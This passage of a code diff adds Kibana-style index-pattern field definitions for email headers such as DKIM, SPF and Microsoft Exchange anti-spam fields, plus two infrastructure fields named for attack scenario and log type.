"readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "content-language.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "content-language" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "content-transfer-encoding", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "content-transfer-encoding.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "content-transfer-encoding" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "content-type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "content-type.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "content-type" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "date", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "date.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "date" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "dkim-signature", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "dkim-signature.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "dkim-signature" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "text", + "keyword" + ], + "name": "emailfolder", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "emailfolder.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "emailfolder" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "feedback-id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "feedback-id.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "feedback-id" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "from", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "from.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "from" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "in-reply-to", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "in-reply-to.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "in-reply-to" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "infra.attack_scenario", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "infra.log_type", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "infralogtype", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "infralogtype.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "infralogtype" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "message", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "message-id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "message-id.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "message-id" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "message.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "message" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "mime-version", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "mime-version.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "mime-version" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "received", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "received-spf", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "received-spf.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "received-spf" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "received.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "received" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "references", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "references.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "references" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "return-path", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "return-path.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "return-path" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "subject", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "subject.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "subject" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "thread-index", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "thread-index.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "thread-index" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "thread-topic", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "thread-topic.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "thread-topic" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "to", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "to.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "to" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-account-notification-type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-account-notification-type.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-account-notification-type" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-eopattributedmessage", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-eopattributedmessage.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-eopattributedmessage" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-eoptenantattributedmessage", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-eoptenantattributedmessage.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-eoptenantattributedmessage" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-forefront-antispam-report-untrusted", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-forefront-antispam-report-untrusted.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-forefront-antispam-report-untrusted" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-gm-message-state", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-gm-message-state.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-gm-message-state" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-google-dkim-signature", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-google-dkim-signature.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-google-dkim-signature" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-google-smtp-source", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-google-smtp-source.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-google-smtp-source" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-incomingheadercount", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-incomingheadercount.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-incomingheadercount" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-incomingtopheadermarker", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-incomingtopheadermarker.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-incomingtopheadermarker" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-message-delivery", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-message-delivery.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-message-delivery" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-message-info", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-message-info.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-message-info" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-microsoft-antispam", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-microsoft-antispam-mailbox-delivery", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-microsoft-antispam-mailbox-delivery.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-microsoft-antispam-mailbox-delivery" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-microsoft-antispam-message-info", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-microsoft-antispam-message-info-original", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-microsoft-antispam-message-info-original.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-microsoft-antispam-message-info-original" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-microsoft-antispam-message-info.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-microsoft-antispam-message-info" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-microsoft-antispam-prvs", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-microsoft-antispam-prvs.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-microsoft-antispam-prvs" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-microsoft-antispam-untrusted", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-microsoft-antispam-untrusted.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-microsoft-antispam-untrusted" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-microsoft-antispam.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-microsoft-antispam" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-antispam-messagedata", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-antispam-messagedata-original", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-antispam-messagedata-original.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-antispam-messagedata-original" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-antispam-messagedata.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-antispam-messagedata" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-authentication-results", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-authentication-results.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-authentication-results" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-crosstenant-authas", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-crosstenant-authas.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-crosstenant-authas" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-crosstenant-authsource", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-crosstenant-authsource.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-crosstenant-authsource" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-crosstenant-fromentityheader", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-crosstenant-fromentityheader.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-crosstenant-fromentityheader" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-crosstenant-id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-crosstenant-id.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-crosstenant-id" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-crosstenant-network-message-id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-crosstenant-network-message-id.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-crosstenant-network-message-id" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-crosstenant-originalarrivaltime", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-crosstenant-originalarrivaltime.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-crosstenant-originalarrivaltime" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-crosstenant-originalattributedtenantconnectingip", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-crosstenant-originalattributedtenantconnectingip.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-crosstenant-originalattributedtenantconnectingip" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-crosstenant-rms-persistedconsumerorg", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-crosstenant-rms-persistedconsumerorg.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-crosstenant-rms-persistedconsumerorg" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-eopdirect", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-eopdirect.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-eopdirect" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-minimumurldomainage", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-minimumurldomainage.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-minimumurldomainage" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-organization-authas", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-organization-authas.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-organization-authas" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-organization-authsource", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-organization-authsource.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-organization-authsource" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-organization-expirationinterval", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-organization-expirationinterval.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-organization-expirationinterval" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-organization-expirationintervalreason", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-organization-expirationintervalreason.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-organization-expirationintervalreason" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-organization-expirationstarttime", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-organization-expirationstarttime.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-organization-expirationstarttime" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-organization-expirationstarttimereason", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-organization-expirationstarttimereason.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-organization-expirationstarttimereason" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-organization-messagedirectionality", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-organization-messagedirectionality.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-organization-messagedirectionality" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-organization-network-message-id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-organization-network-message-id.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-organization-network-message-id" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-organization-pcl", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-organization-pcl.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-organization-pcl" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-organization-recordreviewcfmtype", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-organization-recordreviewcfmtype.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-organization-recordreviewcfmtype" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-organization-scl", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-organization-scl.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-organization-scl" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-processed-by-bccfoldering", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-processed-by-bccfoldering.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-processed-by-bccfoldering" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-senderadcheck", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-senderadcheck.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-senderadcheck" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-transport-crosstenantheaderspromoted", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-transport-crosstenantheaderspromoted.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-transport-crosstenantheaderspromoted" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-transport-crosstenantheadersstamped", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "x-ms-exchange-transport-crosstenantheadersstamped.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "x-ms-exchange-transport-crosstenantheadersstamped" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "x-ms-exchange-transport-crosstenantheadersstripped", + 